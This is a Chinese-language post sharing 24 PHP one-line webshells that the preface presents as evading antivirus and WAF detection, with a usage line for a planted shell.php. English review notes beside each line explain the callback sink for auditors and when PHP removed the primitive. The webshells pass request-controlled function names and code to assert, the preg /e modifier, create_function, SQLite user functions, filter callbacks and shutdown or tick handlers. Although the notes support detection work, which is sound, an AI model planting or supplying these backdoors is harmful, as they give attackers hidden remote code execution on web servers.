前言
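分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8 、或sqlite/pdo/yaml/memcached扩展等)
这些写法的共同点是:回调函数名或回调的参数直接来自请求参数,因此审计和检测时应以"外部输入流入回调参数"为线索,而不是只匹配eval等关键字。另外,它们依赖的执行原语在新版本PHP中大多已被移除:字符串形式的assert()在PHP 7.2弃用、8.0移除;preg系列的/e修饰符在PHP 7.0移除;mb_ereg_replace的e选项和create_function()在PHP 8.0移除。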
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass
正文
01
  // Review note: $_REQUEST['e'] is used as array_filter()'s callback and is invoked on
  // $_POST['pass'], so both the function name and its argument come from the request.
  // Static detection should track request data reaching a callable parameter. The page's
  // usage line (e=assert) relies on string-evaluating assert(), which was deprecated in
  // PHP 7.2 and removed in PHP 8.0.
  | $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_filter($arr, $e); 
  | 
 
02
  // Review note: array_map() is called with $_REQUEST['e'] as the callable and
  // $_POST['pass'] as the mapped element. No eval keyword appears, so keyword signatures
  // miss it; flag any array_map() whose first argument is derived from request input.
  | $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_map($e, $arr); 
  | 
 
03
  // Review note: uasort() calls the user comparator with pairs of array values; the
  // comparator name is $_REQUEST['e'] and one of the two values is $_REQUEST['pass'].
  // A comparator taken from request data has no place in application code and is a
  // reliable audit signal.
  | $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, $e); 
  | 
 
04
  // Review note: uksort() passes array keys to the comparator; the request value sits in
  // key position ($_REQUEST['pass'] => 2) and the comparator is $_REQUEST['e'].
  // Taint rules need to treat array keys, not only values, as carriers of request data.
  | $e = $_REQUEST['e']; $arr = array('test' => 1, $_REQUEST['pass'] => 2); uksort($arr, $e); 
  | 
 
05
  // Review note: ArrayObject::uasort() takes a comparator callable; here it is the literal
  // 'assert' and the wrapped array holds $_REQUEST['pass']. The string 'assert' in a
  // callable position is a usable static signature. String-evaluating assert() was
  // deprecated in PHP 7.2 and removed in PHP 8.0.
  | $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort('assert'); 
  | 
 
06
  // Review note: ArrayObject::uksort() hands array keys to the comparator; the request
  // value is used as a key ($_REQUEST['pass'] => 2) and the comparator is the literal
  // 'assert'. Detection should cover object-method sort calls as well as the uasort()/
  // uksort() functions.
  | $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2)); $arr->uksort('assert'); 
  | 
 
07
  // Review note: array_reduce() calls the callback with (carry, item); the initial carry is
  // $_POST['pass'] and the callback is $_REQUEST['e'], so the request controls both the
  // function and its first argument. The third argument of array_reduce() is a taint
  // sink whenever the callback is not a fixed, known function.
  | $e = $_REQUEST['e']; $arr = array(1); array_reduce($arr, $e, $_POST['pass']); 
  | 
 
08
  // Review note: the last argument of array_udiff() is the comparison callback; it is
  // $_REQUEST['e'], and the compared values include $_POST['pass']. Treat the callback
  // slot of every array_u*() function as a callable sink during review.
  | $e = $_REQUEST['e']; $arr = array($_POST['pass']); $arr2 = array(1); array_udiff($arr, $arr2, $e); 
  | 
 
09
  // Review note: array_walk() calls the callback with (value, key, extra argument), here
  // ('|.*|e', $_POST['pass'], ''), and the callback is $_REQUEST['e']. The literal '|.*|e'
  // is a PCRE pattern carrying the e (eval) modifier, which was deprecated in PHP 5.5 and
  // removed in PHP 7.0; an e-modifier pattern literal is itself worth flagging.
  | $e = $_REQUEST['e']; $arr = array($_POST['pass'] => '|.*|e',); array_walk($arr, $e, ''); 
  | 
 
10
  // Review note: array_walk_recursive() is given $_REQUEST['e'] as its callback, over an
  // array whose key is $_POST['pass'] and whose value is the e-modifier pattern '|.*|e'.
  // The PCRE e modifier was removed in PHP 7.0. Detection rules written for array_walk()
  // should list the recursive variant explicitly.
  | $e = $_REQUEST['e']; $arr = array($_POST['pass'] => '|.*|e',); array_walk_recursive($arr, $e, ''); 
  | 
 
11
  // Review note: the 'e' option makes mb_ereg_replace() evaluate the replacement string as
  // PHP code, and the replacement is $_REQUEST['pass']. The option was deprecated in
  // PHP 7.1 and removed in PHP 8.0; on older runtimes any 'e' option in this call is
  // equivalent to code execution and should be flagged regardless of the other arguments.
  | mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e') 
  | 
 
12
  // Review note: preg_filter() is called with an e-modifier pattern ('|.*|e') and
  // $_REQUEST['pass'] as the replacement, so the replacement is evaluated as code on
  // runtimes that still honour the modifier (deprecated in PHP 5.5, removed in PHP 7.0).
  // Scan for the e modifier in every preg_* pattern, not only in preg_replace().
  | echo preg_filter('|.*|e', $_REQUEST['pass'], ''); 
  | 
 
13
  // Review note: ob_start() registers 'assert' as the output-buffer callback, so the echoed
  // $_REQUEST['pass'] is handed to that callback when the buffer is flushed. Audit
  // ob_start() callbacks like any other callable sink. String-evaluating assert() was
  // removed in PHP 8.0.
  | ob_start('assert'); echo $_REQUEST['pass']; ob_end_flush(); 
  | 
 
14
  // Review note: register_shutdown_function() stores a callable and its arguments to run
  // at script end; both come from the request here ($_REQUEST['e'], $_REQUEST['pass']).
  // Execution is deferred past the visible end of the script, so dynamic analysis has to
  // observe shutdown handlers as well as the main body.
  | $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']); 
  | 
 
15
  // Review note: declare(ticks=1) plus register_tick_function() registers $_REQUEST['e'] as
  // a tick handler with $_REQUEST['pass'] as its argument. Tick handlers are rare in
  // ordinary web code, so the pair is a strong review signal even before the callable's
  // origin is traced.
  | $e = $_REQUEST['e']; declare(ticks=1); register_tick_function($e, $_REQUEST['pass']); 
  | 
 
16
  // Review note: FILTER_CALLBACK makes filter_var() pass the input to the callable named in
  // 'options'; here the callable is the literal 'assert' and the input is
  // $_REQUEST['pass']. A "filter" call therefore acts as an execution sink. Review every
  // FILTER_CALLBACK use and the callable it names.
  | filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert')); 
  | 
 
17
  // Review note: this is the array form of the FILTER_CALLBACK pattern: filter_var_array()
  // applies the callable 'assert' to the 'test' entry, which holds $_REQUEST['pass'].
  // The callable is nested two levels deep in the definition array, so pattern-based
  // scanners need to inspect the filter definition rather than the call's top-level arguments.
  | filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 
  | 
 
18
  // Review note: PDO::sqliteCreateFunction() exposes a PHP callable as an SQL function; the
  // callable is $_REQUEST['e'] and it is invoked on the bound $_REQUEST['pass'].
  // The parameterised query gives no protection because the function itself is
  // request-chosen. Needs the pdo_sqlite extension; opening 'sqlite:sqlite.db3' may leave a
  // sqlite.db3 file in the working directory, a possible forensic artifact (confirm on the host).
  | $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('myfunc', $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(':exec' => $_REQUEST['pass'])); 
  | 
 
19
  // Review note: SQLite3::createFunction() registers $_REQUEST['e'] as the SQL function
  // 'myfunc', which the prepared statement then calls on the bound $_REQUEST['pass'].
  // Binding the value does not matter when the registered callable is request-controlled.
  // Needs the sqlite3 extension; a sqlite.db3 file may be left in the working directory
  // (confirm on the host).
  | $e = $_REQUEST['e']; $db = new SQLite3('sqlite.db3'); $db->createFunction('myfunc', $e); $stmt = $db->prepare("SELECT myfunc(?)"); $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); $stmt->execute(); 
  | 
 
20
  // Review note: the fourth argument of yaml_parse() maps YAML tags to PHP callables; here
  // a tag built from $_REQUEST['pass'] is mapped to 'preg_replace', and the document
  // carries an e-modifier pattern. Needs the yaml extension. The PCRE e modifier was
  // removed in PHP 7.0. Any yaml_parse() call with a callbacks array deserves review of
  // which callables it names and where the tag names come from.
  | $str = urlencode($_REQUEST['pass']); $yaml = <<<EOD greeting: !{$str} "|. |e" EOD; $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace')); 
  | 
 
21
  // Review note: the last argument passed to Memcache::addServer() is a callback built with
  // create_function() that forwards its first argument to assert(); $_REQUEST['pass'] is
  // then given to connect() as the host. create_function() was deprecated in PHP 7.2 and
  // removed in PHP 8.0 and builds its function from a code string, so its presence alone
  // is a review finding. Needs the memcache extension.
  | $mem = new Memcache() $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);')) $mem->connect($_REQUEST['pass'], 11211, 0) 
  | 
 
22
  // Review note: preg_replace_callback() runs a create_function() callback that passes the
  // match ($arr[0]) to assert(); the subject being matched is $_REQUEST['pass'].
  // create_function() and string-evaluating assert() were both removed in PHP 8.0.
  // Detection should follow the subject argument into the callback body.
  | preg_replace_callback('/. /i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']) 
  | 
 
23
  // Review note: mb_ereg_replace_callback() runs a create_function() callback that passes
  // the match ($arr[0]) to assert(); the subject is $_REQUEST['pass'].
  // Rules covering preg_replace_callback() should also list the mbstring callback variant.
  // create_function() was removed in PHP 8.0.
  | mb_ereg_replace_callback('. ', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']) 
  | 
 
24
  // Review note: CallbackFilterIterator invokes its callback for each element while the
  // foreach loop iterates; the callback is built with create_function() and passes the
  // element, $_REQUEST['pass'], to assert(). SPL iterators that accept callables belong on
  // the callable-sink list. create_function() was removed in PHP 8.0.
  | $iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);')); foreach ($iterator as $item) {echo $item;} 
  |